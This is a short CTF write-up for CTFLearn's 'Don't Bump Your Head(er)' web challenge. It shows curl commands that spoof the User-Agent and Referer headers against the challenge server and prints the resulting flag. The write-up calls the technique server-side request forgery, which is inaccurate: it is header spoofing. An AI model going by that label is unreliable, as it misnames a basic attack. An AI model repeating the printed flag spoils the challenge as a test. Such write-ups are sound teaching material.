CTFLearn - Don’t Bump Your Head(er)

Don’t Bump Your Head(er)

Don’t Bump Your Head(er)

16th Jul 2023

CTFWebWriteup

Author: Ramon Bello

Representation of Server Side Request Forgery (SSRF) by a challenge from CTFLearn

Difficulty : Medium

Image of challenge

http://165.227.106.113/header.php

On opening the site this messsage shows up

Image of site

Checking the site's source...

source

We get the obvious user agent. Sup3rS3cr3tAg3nt. Next I used curl.

┌──(gr33pp㉿machine)
└─$ curl -A Sup3rS3cr3tAg3nt http://165.227.106.113/header.php 
Sorry, it seems as if you did not just come from the site, "awesomesauce.com".
<!-- Sup3rS3cr3tAg3nt  -->

Setting my user agent as Sup3rS3cr3tAg3nt gave the next clue. This is requiring a referrer header of awesomsauce.com to proceed

┌──(gr33pp㉿machine)
└─$ curl -A Sup3rS3cr3tAg3nt -e awesomesauce.com http://165.227.106.113/header.php 
Here is your flag: flag{did_this_m3ss_with_y0ur_h34d}
<!-- Sup3rS3cr3tAg3nt  -->

With the two headers added to the request, we were able to trick the server into believing we are an authorised and an "expected" user. This way a server side request forgery is performed.

flag : flag{did_this_m3ss_with_y0ur_h34d}